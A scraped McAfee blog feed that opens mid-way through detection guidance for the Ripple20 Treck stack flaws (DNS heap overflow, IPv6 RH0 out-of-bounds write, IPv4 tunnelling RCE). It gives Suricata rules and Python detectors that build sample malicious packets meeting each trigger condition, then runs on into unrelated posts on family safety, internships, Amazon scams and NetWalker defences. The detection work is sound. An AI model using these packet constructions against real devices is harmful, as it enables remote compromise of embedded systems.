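ALLOWED = set(b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_*")
TYPE_CNAME = 5


def read_name(msg, off):
    """Walk labels from msg[off] until a null byte, a compression pointer
    (consumed but not followed) or the end of the payload.
    Returns (labels, compressed_len, next_off)."""
    labels, start = [], off
    while off < len(msg):
        n = msg[off]
        if n == 0:
            off += 1
            break
        if n & 0xC0 == 0xC0:           # RFC 1035 pointer: 2 bytes, ends the name
            off += 2
            break
        labels.append(msg[off + 1:off + 1 + n])
        off += 1 + n
    off = min(off, len(msg))
    return labels, off - start, off


def walk_records(msg):
    """Yield (labels, compressed_len, rtype, rdlength, rdata_off) for each
    question (RR fields None) and resource record; stops quietly if truncated."""
    if len(msg) < 12:
        return
    qd, an, ns, ar = struct.unpack("!HHHH", msg[4:12])
    off = 12
    for _ in range(qd):
        labels, clen, off = read_name(msg, off)
        yield labels, clen, None, None, None
        off += 4                       # QTYPE + QCLASS
    for _ in range(an + ns + ar):
        if off >= len(msg):
            return
        labels, clen, off = read_name(msg, off)
        if off + 10 > len(msg):
            return
        rtype, _cls, _ttl, rdlength = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        yield labels, clen, rtype, rdlength, off
        off += rdlength


def invalid_names(msg):
    """dns_invalid_name analogue: over-long compressed names or disallowed
    characters, checked in owner names and in CNAME RDATA."""
    reasons = []
    for labels, clen, rtype, _rdlength, rdata_off in walk_records(msg):
        names = [(labels, clen)]
        if rtype == TYPE_CNAME:
            names.append(read_name(msg, rdata_off)[:2])
        for lbls, length in names:
            if length > MAX_COMPRESSED_NAME:
                reasons.append("name longer than 255 bytes")
            bad = set(b"".join(lbls)) - ALLOWED
            if bad:
                reasons.append("disallowed characters %r" % bytes(sorted(bad)))
    return reasons


def pointer_stats(msg):
    """Variant 1 heuristic: flat label-mode pass over the answer sections.
    Any length byte above 0x3F counts as a pointer (Treck's classification);
    fixed RR fields are stepped over as if they were labels, which resets the
    consecutive run on normal records.  Returns (total, longest_run)."""
    if len(msg) < 12:
        return 0, 0
    off = 12
    for _ in range(struct.unpack("!H", msg[4:6])[0]):
        off = read_name(msg, off)[2] + 4
    total = run = longest = 0
    while off < len(msg):
        n = msg[off]
        if n > 0x3F:
            total, run = total + 1, run + 1
            longest = max(longest, run)
            off += 2
        else:
            run = 0
            off += 1 + n
    return total, longest


def cname_rdlength_mismatch(msg):
    """Variant 2: CNAME records whose walked RDATA name exceeds RDLENGTH."""
    hits = []
    for _labels, _clen, rtype, rdlength, rdata_off in walk_records(msg):
        if rtype == TYPE_CNAME:
            actual = read_name(msg, rdata_off)[1]
            if actual > rdlength:
                hits.append((rdlength, actual))
    return hits


def assess(msg):
    total, longest = pointer_stats(msg)
    return {"invalid_name": invalid_names(msg),
            "pointer_storm": total > MAX_POINTERS_TOTAL or longest >= MAX_POINTERS_CONSECUTIVE,
            "cname_mismatch": cname_rdlength_mismatch(msg)}


# --- constructed sample responses (not captured traffic) ---------------------
def encode_name(name):
    return b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"


def rr(owner, rtype, rdata, rdlength=None):
    rdlength = len(rdata) if rdlength is None else rdlength
    return owner + struct.pack("!HHIH", rtype, 1, 300, rdlength) + rdata


def build_response(qname, answer):
    """Header (id 0x1234, QR|RD|RA, QDCOUNT=1, ANCOUNT=1) + question + answer."""
    hdr = struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 1, 0, 0)
    return hdr + encode_name(qname) + struct.pack("!HH", 1, 1) + answer


PTR = b"\xC0\x0C"                      # pointer to the question name at offset 12
BENIGN = build_response("www.example.com", rr(PTR, 1, bytes([93, 184, 216, 34])))
PTR_STORM = build_response("www.example.com", rr(PTR * 5, 1, bytes([93, 184, 216, 34])))
BAD_CNAME = build_response("example.com",
                           rr(PTR, TYPE_CNAME, encode_name("https://evil.example"), rdlength=4))
```

Run `assess()` over each sample: the benign response raises nothing, the five-pointer owner name trips the consecutive-pointer threshold, and the CNAME whose RDATA walks to 22 bytes against an RDLENGTH of 4 is reported by both the RDLENGTH comparison and the character check (":" and "/").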

False positive conditions (signatures detecting non-malicious traffic):

False positives should be unlikely, but possible in scenarios where network devices send non-malicious traffic where RDLENGTH is not equal to the size of RDATA, thereby breaking RFC 1035.

False negative conditions (signatures failing to detect vulnerability/exploitation):

Since the detection logic does not perform decompression when computing the “actual size” of RDATA, it will fail to detect malicious packets that contain domain names whose length only exceeds RDLENGTH after decompression. Unfortunately, coverage for this case is non-trivial as such packets are actually RFC-compliant. According to RFC 1035, section 4.1.4:

If a domain name is contained in a part of the message subject to a length field (such as the RDATA section of an RR), and compression is used, the length of the compressed name is used in the length calculation, rather than the length of the expanded name.

Besides the computational overhead, enforcing such a check would likely result in very high false positive rates.

Signature(s):

dns_heap_overflow.rules:

# Variant 2

alert dns any any -> any any (flow:to_client; msg:"Potential DNS heap overflow exploit (CVE-2020-11901)"; lua:dns_heap_overflow_variant_2.lua; sid:2020119012; rev:1;)
Lua script (dns_heap_overflow_variant_2.lua) can be found in Appendix A

Write Out-of-Bounds Using Routing Header Type 0

CVE: CVE-2020-11897
CVSS: 10
Protocol(s): IPv6
Port(s): N/A

Vulnerability description:

When processing IPv6 incoming packets, an inconsistency parsing the IPv6 routing header can be triggered where the header length is checked against the total packet and not against the fragment length. This means that if we send fragmented packets with the overall size greater than or equal to the specified routing header length, then we process the routing header under the assumption that we have enough bytes in our current fragment (where we have enough bytes in the overall reassembled packet only). Thus, using routing header type 0 (RH0) we can force read and write into out-of-bounds memory location.

There is also a secondary side effect where we can get an info leak in a source IPv6 address in an ICMP parameter returned from the device.

Limitations or special considerations for detection:

The RFC for RH0 defines the length field as equal to “two times the number of addresses in the header.”  For example, if the routing header length is six, then there are three IPv6 addresses expected in the header. Upon reconstruction of the fragmented packets, the reported number of addresses is filled with data from the fragments that follow. This creates “invalid” IPv6 addresses in the header and potentially malforms the next layer of the packet. During exploitation, it would also be likely for the next layer of the packet to be malformed. Although ICMP can be used to perform an information leak, it is possible for the next layer to be any type and therefore vary in length. Verification of the length of this layer could therefore be very expensive and non-deterministic.

Recommended detection criteria:

  • The device must be capable of processing fragmented IPv6 traffic
  • The device should inspect fragmented packets containing Routing Header type 0 (RH0). If a RH0 IPv6 packet is fragmented, then the vulnerability is likely being exploited
  • If the length of the IPv6 layer of a packet fragment containing the RH0 header is less than the length reported in the routing header, then the vulnerability is likely being exploited
  • Upon reconstruction of the fragmented packets, if the header of the layer following IPv6 is malformed, the vulnerability may be being exploited
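The per-fragment checks listed above, as an added Python example that is not McAfee's ipv6_rh0.rules: walk the IPv6 extension-header chain of one fragment, note whether it carries a Fragment header and a type 0 Routing Header, and compare the RH0's declared length (8 + 8 × Hdr Ext Len bytes) against the bytes actually present in that fragment. The sample packets are constructed inline; the reassembled-next-layer check from the last criterion is out of scope here since it needs full reassembly.

```python
"""Per-fragment check for the CVE-2020-11897 condition: an IPv6 Routing
Header type 0 whose declared length is not fully present in the fragment
that carries it.  Constructed example, not McAfee's rule set."""
import struct

NH_HOPOPTS, NH_ROUTING, NH_FRAGMENT, NH_ICMPV6, NH_DSTOPTS = 0, 43, 44, 58, 60
EXT_HEADERS = {NH_HOPOPTS, NH_ROUTING, NH_FRAGMENT, NH_DSTOPTS}
RH_TYPE_0 = 0


def parse_ipv6_fragment(pkt):
    """Walk the extension-header chain of one IPv6 packet (possibly a single
    fragment) and record Fragment-header and RH0 facts."""
    info = {"fragmented": False, "more_fragments": False, "frag_offset": 0,
            "rh0": False, "rh0_declared": 0, "rh0_present": 0, "next_layer": None}
    if len(pkt) < 40:
        return info
    nh, off = pkt[6], 40
    while nh in EXT_HEADERS and off + 8 <= len(pkt):
        next_nh = pkt[off]
        if nh == NH_FRAGMENT:
            _, _, frag, _ = struct.unpack("!BBHI", pkt[off:off + 8])
            info.update(fragmented=True, frag_offset=frag >> 3,
                        more_fragments=bool(frag & 1))
            hlen = 8
        else:
            # Hdr Ext Len counts 8-octet units beyond the first 8 octets.
            hlen = 8 + 8 * pkt[off + 1]
            if nh == NH_ROUTING and pkt[off + 2] == RH_TYPE_0:
                info.update(rh0=True, rh0_declared=hlen,
                            rh0_present=min(hlen, len(pkt) - off))
        off += hlen
        nh = next_nh
    info["next_layer"] = nh
    return info


def rh0_findings(pkt):
    """The post's criteria, weakest first: any RH0 (Suricata's default rule),
    RH0 in a fragment, RH0 longer than the fragment that carries it."""
    info = parse_ipv6_fragment(pkt)
    findings = []
    if info["rh0"]:
        findings.append("RH0 present (deprecated by RFC 5095)")
        if info["fragmented"]:
            findings.append("RH0 inside a fragmented packet")
        if info["rh0_present"] < info["rh0_declared"]:
            findings.append("RH0 declares %d bytes but the fragment carries only %d"
                            % (info["rh0_declared"], info["rh0_present"]))
    return findings


# --- constructed packets (link-local addresses, no real traffic) -------------
SRC = bytes.fromhex("fe80" + "00" * 13 + "01")
DST = bytes.fromhex("fe80" + "00" * 13 + "02")


def ipv6(next_header, payload):
    return struct.pack("!IHBB", 0x60000000, len(payload), next_header, 64) + SRC + DST + payload


def fragment_header(next_header, offset, more, ident):
    return struct.pack("!BBHI", next_header, 0, (offset << 3) | int(more), ident)


def rh0_header(next_header, addresses_declared, addresses_present):
    """Hdr Ext Len = 2 * addresses declared; only addresses_present are appended."""
    fixed = struct.pack("!BBBBI", next_header, 2 * addresses_declared,
                        RH_TYPE_0, addresses_declared, 0)
    return fixed + DST * addresses_present


ECHO = ipv6(NH_ICMPV6, struct.pack("!BBHHH", 128, 0, 0, 1, 1))
# First fragment: RH0 claims three addresses (56 bytes) but only one is here.
FRAG_RH0 = ipv6(NH_FRAGMENT, fragment_header(NH_ROUTING, 0, True, 7)
                + rh0_header(NH_ICMPV6, 3, 1))
```

`rh0_findings(FRAG_RH0)` returns all three findings, while an unfragmented RH0 whose addresses are all present only matches the deprecated-header rule, which is the false-positive case the post attributes to legacy devices.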

Notes:

The routing header type 0 was deprecated in IPv6 traffic in RFC 5095 as of December 2007. As a result, it may be feasible simply to detect packets using this criterion. False positives may be possible in this scenario for legacy devices or platforms. Suricata already provides a default rule for this scenario which has been added below. According to the RFC, routers are not supposed to fragment IPv6 packets and must support an MTU of 1280, which would always contain all of the RH0 header, unless an unusual amount of header extensions or an unusually large header is used. If this is followed, then a packet using the RH0 header should never be fragmented across the RH0 extension header bounds and any RH0 packet fragmented in this manner should be treated as potentially malicious. Treating any fragmented RH0 packet as potentially malicious may be sufficient. Furthermore, treating any fragmented RH0 packet with fragments size below a threshold as well as IPv6 packets with multiple extension headers or an unusually large header above a threshold may provide high accuracy detection.

False positive conditions (signatures detecting non-malicious traffic):

If all detection criteria outlined above are used, false positives should be minimal since the reported length of a packet should match its actual length and the next header should never contain malformed data.  If only routing header type 0 is checked, false positives are more likely to occur.  In the additional provided rule, false positives should be minimal since RH0 is deprecated and the ICMP header should never have invalid checksums or unknown codes.

False negative conditions (signatures failing to detect vulnerability/exploitation):

False negatives may occur if the signature is developed overly specific to the layer following IPv6, for example, ICMP.  An attacker could potentially leverage another layer and still exploit the vulnerability without the information leak; however, this would still trigger the default RH0 rule. In the second rule below, false negatives are likely to occur if:

  • An attacker uses a non-ICMP layer following the IPv6 layer
  • A valid ICMP code is used
  • The checksum is valid, and the payload is less than or equal to 5 bytes (this value can be tuned in the signature)

Signature(s):

Ipv6_rh0.rules:

alert ipv6 any any -> any any (msg:"SURICATA RH Type 0"; decode-event:ipv6.rh_type_0; classtype:protocol-command-decode; sid:2200093; rev:2;)

alert ipv6 any any -> any any (msg:"IPv6 RH0 Treck CVE-2020-11897"; decode-event:ipv6.rh_type_0; decode-event:icmpv6.unknown_code; icmpv6-csum:invalid; dsize:>5; sid:2020118971; rev:1;)

IPv4/UDP Tunneling Remote Code Execution

CVE: CVE-2020-11896

CVSS: 10.0
Protocol(s): IPv4/UDP
Port(s): Any

Vulnerability description:

The Treck TCP/IP stack does not properly handle incoming IPv4-in-IPv4 packets with fragmented payload data. This could lead to remote code execution when sending multiple specially crafted tunneled UDP packets to a vulnerable host.

The vulnerability is a result of an incorrect trimming operation when the advertised total IP length (in the packet header) is strictly less than the data available. When sending tunneled IPv4 packets using multiple fragments with a small total IP length value, the TCP/IP stack would execute the trimming operation. This leads to a heap overflow situation when the packet is copied to a destination packet allocated based on the smaller length. When the tunneled IPv4 packets are UDP packets sent to a listening port, there’s a possibility to trigger this exploit if the UDP receive queue is non-empty. This can result in an exploitable heap overflow situation, leading to remote code execution in the context in which the Treck TCP/IP stack runs.

Recommended detection criteria:

In order to detect an ongoing attack, the following conditions should be met if encapsulation can be unpacked:

  • The UDP receive queue must be non-empty
  • Incoming UDP packets must be fragmented
    • Flag MF = 1 with any offset, or
    • Flag MF = 0 with non-zero offset
  • Fragmented packets must have encapsulated IPv4 packet (upon assembly)
    • protocol = 0x4 (IPIP)
  • Encapsulated IPv4 packet must be split across 2 packet fragments.
  • Reassembled (inner-most) IPv4 packet has incorrect data length stored in IP header.

The fourth condition above is required to activate the code-path which is vulnerable, as it spreads the data to be copied across multiple in-memory buffers. The final detection step is the source of the buffer overflow, as such, triggering on this may be sufficient.

Depending on the limitations of the network inspection device in question, a looser condition could be used, though it may be more prone to false positives.

In order to detect an ongoing attack if encapsulation cannot be unpacked:

  • The UDP receive queue must be non-empty
  • Incoming UDP packets must be fragmented
    • Flag MF = 1 with any value in offset field, or
    • Flag MF = 0 with any non-zero value in offset field
  • Final fragment has total fragment length longer than offset field.

The final condition shown above is not something that should be seen in a normal network.

Fragmentation, when it occurs, is the result of data overflowing the MTU of a given packet type. This indicates the final fragment should be no larger than any other fragment – and in practice would likely be smaller. The inverse, where the final fragment is somehow larger than previous fragments, indicates that the fragmentation is not the result of MTU overflow, but instead something else. In this case, malicious intent.

As network monitors in common usage are likely to have the ability to unpack encapsulation, only that ruleset is provided.
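Both criteria lists above, as an added Python example that is not McAfee's tunnel_length_check.lua: a minimal fragment reassembler, the no-unpack heuristic (a final fragment carrying more bytes than all fragments before it, which is how this example reads "total fragment length longer than offset field"), and the unpacked check that the IPIP payload spans at least two fragments and its inner IPv4 header advertises fewer bytes than were actually reassembled. The UDP receive-queue condition is host state and cannot be observed on the wire, so it is not modelled. Fragments are constructed inline; checksums are left zero.

```python
"""Fragment-reassembly checks for CVE-2020-11896 (IPv4-in-IPv4 whose inner
total length is smaller than the data carried).  Constructed example."""
import struct

IPPROTO_IPIP, IPPROTO_UDP = 4, 17
IP_MF = 0x2000


def ipv4_header(total_len, proto, flags_frag=0, ident=0x4242,
                src=b"\x0a\x00\x00\x01", dst=b"\x0a\x00\x00\x02"):
    """20-byte IPv4 header; checksum left zero (constructed packets only)."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, ident,
                       flags_frag, 64, proto, 0, src, dst)


def parse_ipv4(pkt):
    ihl = (pkt[0] & 0x0F) * 4
    _, _, total_len, ident, ff, _, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    return {"total_len": total_len, "id": ident, "proto": proto, "src": src, "dst": dst,
            "mf": bool(ff & IP_MF), "offset": (ff & 0x1FFF) * 8, "payload": pkt[ihl:]}


def reassemble(frags):
    """Sort one datagram's fragments by offset and concatenate their payloads
    (no overlap handling; real reassembly also keys on src/dst/id/proto)."""
    parsed = sorted((parse_ipv4(f) for f in frags), key=lambda p: p["offset"])
    return parsed, b"".join(p["payload"] for p in parsed)


def tunnel_findings(frags):
    parsed, data = reassemble(frags)
    findings = []
    last = parsed[-1]
    # No-unpack heuristic: the final fragment is larger than everything
    # before it, which MTU-driven fragmentation never produces.
    if (len(parsed) > 1 and not last["mf"] and last["offset"] > 0
            and len(last["payload"]) > last["offset"]):
        findings.append("final fragment (%d bytes) larger than the %d bytes preceding it"
                        % (len(last["payload"]), last["offset"]))
    # Unpacked check: IPIP payload split across >= 2 fragments whose inner
    # header advertises fewer bytes than were reassembled (the trimming bug).
    if parsed[0]["proto"] == IPPROTO_IPIP and len(parsed) >= 2 and len(data) >= 20:
        inner = parse_ipv4(data)
        if inner["total_len"] < len(data):
            findings.append("inner IPv4 total length %d < %d bytes reassembled"
                            % (inner["total_len"], len(data)))
            if inner["proto"] == IPPROTO_UDP:
                findings.append("inner packet is UDP (the exploitable CVE-2020-11896 path)")
    return findings


# --- constructed fragments ---------------------------------------------------
def fragment(payload, proto, split_at):
    """Split payload into two outer fragments at split_at (a multiple of 8)."""
    head, tail = payload[:split_at], payload[split_at:]
    return [ipv4_header(20 + len(head), proto, IP_MF) + head,
            ipv4_header(20 + len(tail), proto, split_at // 8) + tail]


def udp(payload, sport=40000, dport=5353):
    return struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload


BENIGN_FRAGS = fragment(udp(b"B" * 32), IPPROTO_UDP, 32)
# Inner packet really spans 68 bytes but its header advertises only 28.
INNER = ipv4_header(28, IPPROTO_UDP) + udp(b"A" * 40)
EXPLOIT_FRAGS = fragment(INNER, IPPROTO_IPIP, 16)
```

The ordinary two-fragment UDP datagram yields no findings; the IPIP pair trips all three checks regardless of the order in which the fragments arrive.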

Limitations or special considerations for detection:

The Treck stack supports (at least) two levels of tunneling. Each tunnel level can be IPv4-in-IPv4, IPv6-in-IPv4, or IPv4-in-IPv6. The above logic is specific to the IPv4-in-IPv4, single level of tunneling case. In cases of deeper nesting, either a recursive check or a full unwrapping of all tunneling layers will be necessary.

False positive conditions (signatures detecting non-malicious traffic):

False positives should be minimal if all detection criteria outlined above are used in the case where the tunneling can be unpacked. In the case where tunneling cannot be unpacked, this is unlikely to trigger many false positives in the presence of standards compliant applications. Fragmentation as seen here is simply not common.

False negative conditions (signatures failing to detect vulnerability/exploitation):

False negatives could occur with deeper levels of nesting, or nesting of IPv6.

Signature(s):

ipv4_tunneling.rules:

alert ip any any -> any any (msg:"IPv4 TUNNELING EXPLOIT (CVE-2020-11896)"; ip_proto:4; lua:tunnel_length_check.lua; sid:2020118961; rev:1;)

Lua script (tunnel_length_check.lua) can be found in Appendix A

Appendix A

Appendix A contains Lua scripts that are required for usage with corresponding Suricata signatures. These scripts are also located on McAfee ATR’s GitHub.

dns_tcp_size.lua: 

dns_size.lua: 

dns_invalid_name.lua:


dns_heap_overflow_variant_1.lua:

dns_heap_overflow_variant_2.lua:

tunnel_length_check.lua:

What Security Means to Families https://www.mcafee.com/blogs/consumer/what-security-means-to-families/ Tue, 04 Aug 2020 17:00:35 +0000 /blogs/?p=104448


What Security Means to Families

One truth of parenting is this: we do a lot of learning on the job. And that often goes double when it comes to parenting and the internet.

That’s understandable. Whereas we can often look to our own families and how we were raised for parenting guidance, today’s always-on mobile internet, with tablets and smartphones almost always within arm’s reach, wasn’t part of our experience growing up. This is plenty new for nearly all of us. We’re learning on the job as it were, which is one of the many reasons why we reached out to parents around the globe to find out what their concerns and challenges are—particularly around family safety and security in this new mobile world of ours.

Just as we want to know our children are safe as they walk to school or play with friends, we want them to be just as safe when they’re online. Particularly when we’re not around and there to look over their shoulder. The same goes for the internet. Yet where we likely have good answers for keeping our kids safe around the house and the neighborhood, answers about internet safety are sometimes harder to come by.

Recently, we conducted a survey of 600 families and professionals in the U.S. to better understand what matters to them—in terms of security and the lives they want to lead online. The following article reflects what they shared with us, and allows us to share it with you in turn, with the aim of helping you and your family stay safer and more secure.[1]

What concerns and questions do parents have about the internet?

The short answer is that parents are looking for guidance and support. They’re focused on the safety of their children, and they want advice on how to parent when it comes to online privacy, safety, and screen time. Within that, they brought up several specific concerns:

Help my kids not feel anxious about growing up in an online world.

There’s plenty wrapped up in this statement. For one, it refers to the potential anxiety that revolves around social networks and the pressures that can come with using social media—how to act, what’s okay to post and what’s not, friending, following, unfriending, unfollowing, and so on—not to mention the notion of FOMO, or “fear of missing out,” and anxiety that arises from feelings of not being included in someone else’s fun.

Keep my kids safe from bullying, or bullying others.

Parents are right to be concerned. Cyberbullying happens. In a study spanning 30 countries, one child in three has said they’ve been the victim of cyberbullying according to a study conducted by UNICEF. On the flip side of that, a 2016 study of more than 5,000 students in the U.S. by the Cyberbullying Research Center reported that 11.5% of students between 12 and 17 indicated that they had engaged in cyberbullying in their lifetime.

Feel like I can leave my child alone with a device without encountering inappropriate content.

If we think of the internet as a city, it’s the biggest one there is. For all its libraries, playgrounds, movie theatres, and shopping centers, there are dark alleys and derelict lots as well. Not to mention places that are simply age appropriate for some and not for others. Just as we give our children freer rein to explore their world on their own as they get older, the same holds true for the internet. There are some things we don’t want them to see and do.

Balance the amount of screen time my children get each day.

Screen time is a mix of many things—from schoolwork and videos to games and social media. It has its benefits and its drawbacks, depending on what children are doing and how often they’re doing it. The issue often comes down to what is “too much” screen time, particularly as it relates to the bigger picture of physical activity, face-to-face time with the family, hanging out with friends, and getting a proper bedtime without the dim light of a screen throwing off their sleep rhythms.

Where can parents get started?

Beyond our job of providing online security for devices, our focus at McAfee is on protecting people. Ultimately, that’s the job we aim to do—to help you and your family be safer. Beyond creating software for staying safe, we also put together blogs and resources that help people get sharp on the security topics that matter to them. For parents, check out this page which puts forward some good guidance and advice that can help. Check it out, and we hope that you’ll find even more ways you can keep you and your family safe.

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

[1] Survey conducted in October 2019, consisting of 600 computer-owning adults in the U.S.

My Experience as a Finance Intern at McAfee for Summer 2020 https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/my-experience-as-a-finance-intern-at-mcafee-for-summer-2020/ https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/my-experience-as-a-finance-intern-at-mcafee-for-summer-2020/#respond Tue, 04 Aug 2020 15:33:11 +0000 /blogs/?p=104589

By: Nilisha, Finance Intern, Plano, TX, United States

Amidst this global pandemic, I was fortunate enough to have the opportunity to be a Finance Intern at McAfee this summer. Working remotely was something that I never thought I would have to do so soon, however, my experience was nothing short of amazing. From the onboarding process to all of the trainings and workshops, McAfee helped make sure all of the summer interns had the most enriching experience.

As a leading-edge cybersecurity company, McAfee offers advanced security solutions to consumers, small and large businesses, enterprises, and governments. Security technologies from McAfee use a unique and predictive capability, which enables home users and businesses to stay one step ahead of the next wave of fileless attacks, viruses, malware, and other online threats.

As a Central Finance Intern, I was exposed to many different programs and softwares such as Hyperion (financial reporting), SAP (managing financials), Qlik (data discovery and analytics), and Power BI (data modeling). I worked with supportive project leads who enabled me to ask as many questions as I wanted and guided me to successfully complete my projects. My work was used on the latest company cash forecasting, and being recognized for that felt really great. Additionally, during the course of the summer, my fellow interns and I worked together to help automate some of the pre-formatting done on the “big-guy” massive Excel workbook that contained the company financials, known as the CRIB. Getting my hands on that and working with macros and VBA code made me realize how I was actually able to solve things on my own and reach out for help whenever I got stuck.

Some fun activities that we did to make our experience as normal as possible included a Finance Intern picnic at a park near the office, a virtual coffee with the CEO, Peter Leav, a Ruins Forbidden Treasure Virtual Escape Room, and numerous Microsoft Teams calls to wind down and grasp the fact that we were lucky enough to make a long-lasting impact. Moreover, People Success, the human resources organization at McAfee, organized many workshops and virtual intern meet-ups with interns from across North America. This was a great way to see what other interns were working on and how their experiences were similar to and different from mine.

Overall, I found my time at McAfee to be one of the most profoundly educational and productive experiences of my career. I am extremely thankful to McAfee for their investment in me, and for providing me the opportunity to learn, develop, and grow as a member of the McAfee team this summer.

Follow @LifeAtMcAfee on Instagram and @McAfee on Twitter to see what working at McAfee is all about. Interested in a new career opportunity at McAfee? Explore Our Careers.

Special Delivery: Criminals Posing as Amazon Are Out to Steal User’s Data (Mon, 03 Aug 2020) https://www.mcafee.com/blogs/consumer/consumer-threat-notices/criminals-posing-as-amazon-are-out-to-steal-users-data/


One of the joys of online shopping is instant gratification – your purchases arrive on your doorstep in just a few days! Unfortunately, consumers aren’t the only ones taking advantage of this convenience – hackers are also using it to trick users into handing over money or data. Recently, AARP recounted several scams where cybercriminals posed as Amazon’s customer service or security team as a ploy to steal your personal information.  

How These Scams Work

These scams all begin with an unsuspecting user seeking help from Amazon’s customer support or its security team, only to find the contact information of a fraudster posing as the company. For example, in one of these scams a user called a fraudulent customer support number to help his wife get back into her account. However, the scammer behind the phone number tried to sell the victim a fake $999 computer program to prevent hacking on his own device. Thankfully, according to AARP, the man refused to send the money.

Another victim reported receiving an email from the “Amazon Security Team,” stating that a fraudulent charge had been made on her account and that it was locked as a result. The email asked for her address and credit or debit card information to unlock her account and get a refund on the fake charge. But upon closer review, the woman noticed that the email address ended in .ng, indicating that it was coming from Nigeria. Luckily, the woman refused to send her information and reported the incident instead.

Not all victims are as lucky. One woman received an email that looked like it was from Amazon and gave the scammers her social security number, credit card number, and access to her devices. Another victim lost $13,300 to scammers who contacted her through a messaging platform stating that someone hacked her Amazon account and that she needed to buy gift cards to restore it.  

Steer Clear of These Tricks

Many of these fraudsters are taking advantage of Amazon’s credibility to trick unsuspecting users out of money and personal data. However, there are ways that users can avoid falling prey to these scams, and that all starts with staying educated on the latest schemes so consumers know what to look out for. By staying knowledgeable on the latest threats, consumers can feel more confident browsing the internet and making online purchases. Protect your digital life by following these security tips:

Go directly to the source

Be skeptical of emails or text messages claiming to be from organizations with peculiar asks or information that seems too good to be true. Instead of clicking on a link within the email or text, it’s best to go straight to the organization’s website or contact customer service. 

Be wary of emails asking you to act

If you receive an email or text asking you to take a specific action or provide personal details, don’t click on anything within the message. Instead, go straight to the organization’s website. This will prevent you from accidentally downloading malicious content. Additionally, note that Amazon does not ask for personal information like bank account numbers or Social Security numbers in unsolicited emails.

Only use one credit card for online purchases

By only using one payment method for online purchases, you can keep a better eye out for fraud instead of monitoring multiple accounts for suspicious activity. 

Look out for common signs of scams

Be on the lookout for fake websites and phone numbers with Amazon’s logo. Look for misspelled words and grammatical errors in emails or other correspondence. If someone sends you a message with a link, hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t click on it, as it’s probably a phishing link that could download malicious content onto your device. It’s best to avoid interacting with the link and delete the message altogether. 

Stay updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

McAfee Defender’s Blog: NetWalker (Mon, 03 Aug 2020) https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-defenders-blog-netwalker/


Building Adaptable Security Architecture Against NetWalker

NetWalker Overview

The NetWalker ransomware, initially known as Mailto, was first detected in August 2019. Since then, new variants were discovered throughout 2019 and the beginning of 2020, with a strong uptick noticed in March of this year. NetWalker has noticeably evolved to a more stable and robust ransomware-as-a-service (RaaS) model, and McAfee research suggests that the malware operators are targeting and attracting a broader range of technically advanced and enterprising criminal affiliates. McAfee Advanced Threat Research (ATR) discovered a large sum of bitcoins linked to NetWalker, which suggests its extortion efforts are effective and that many victims have had no option other than to succumb to its criminal demands. For more details on NetWalker, see the McAfee ATR blog here.

We do not want you to be one of those victims, so this blog is focused on how to build an adaptable security architecture to defeat this threat and, specifically, how McAfee’s portfolio delivers the capability to prevent, detect and respond to NetWalker ransomware.

Gathering Intelligence on NetWalker

As always, building adaptable defensive architecture starts with intelligence. In most organizations, the Security Operations team is responsible for threat intelligence analysis, as well as threat and incident response. The Preview of McAfee MVISION Insights is a sneak peek of some of MVISION Insights capabilities for the threat intel analyst and threat responder. The preview identifies the prevalence and severity of select top emerging threats across the globe which enables the Security Operations Center (SOC) to prioritize threat response actions and gather relevant cyber threat intelligence (CTI) associated with the threat, in this case NetWalker ransomware. The CTI is provided in the form of technical Indicators of Compromise (IOCs) as well as MITRE ATT&CK framework tactics and techniques.

As a threat intel analyst or responder, you can drill down to gather more specific, actionable intelligence on NetWalker, such as prevalence, links to other sources of information, indicators of compromise, and tactics/techniques aligned to the MITRE ATT&CK framework.

From the MVISION Insights preview, you can see that NetWalker leverages tactics and techniques common to other ransomware attacks, such as spear phishing attachments for Initial Access, use of PowerShell for deployment, modification of Registry keys or the Startup folder for Persistence and, of course, encryption of files for Impact.

Defensive Architecture Overview

Today’s digital enterprise is a hybrid environment of on-premise systems and cloud services with multiple entry points for attacks like NetWalker. The work-from-home operating model forced by COVID-19 has only expanded the attack surface and increased the risk of a successful ransomware attack for organizations that did not adapt their security posture. Mitigating the risk of attacks like NetWalker requires a security architecture with the right controls on the device, on the network and in security operations (sec ops). The Center for Internet Security (CIS) Top 20 Cyber Security Controls provides a good guide to building that architecture. For ransomware, and NetWalker in particular, the controls must be layered throughout the enterprise. The following outlines the key security controls needed at each layer of the architecture to protect your enterprise against ransomware.

To assess your capability against NetWalker, you must match your existing controls against the attack stages we learned from the Preview of MVISION Insights. For detailed analysis on the NetWalker ransomware attack, see McAfee ATR’s blog but, for simplicity, we matched the attack stages to the MITRE ATT&CK Framework below.

Initial Access Stage Defensive Overview

According to Threat Intelligence and Research, the initial access is performed either through vulnerability exploitation or spear phishing attachments. The following chart summarizes the controls expected to have the most effect against initial stage techniques and the McAfee solutions to implement those controls where possible.

| MITRE Tactic | MITRE Techniques | CSC Controls | McAfee Capability |
|---|---|---|---|
| Initial Access | Exploit Public-Facing Applications (T1190): Tomcat, WebLogic | CSC 2 Inventory of Software Assets; CSC 3 Continuous Vulnerability Assessment; CSC 5 Secure Configuration of Hardware and Software; CSC 9 Limitation of Network Ports and Protocols; CSC 12 Boundary Defense; CSC 18 Application Software Security | Endpoint Security Platform 10.7, Threat Prevention, Application Control (MAC); Network Security Platform (NSP) |
| Initial Access | Spear Phishing Attachments (T1566.001) | CSC 7 Email and Web Browser Protection; CSC 8 Malware Defenses | Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection; Web Gateway (MWG), Advanced Threat Defense, Web Gateway Cloud Service (WGCS) |
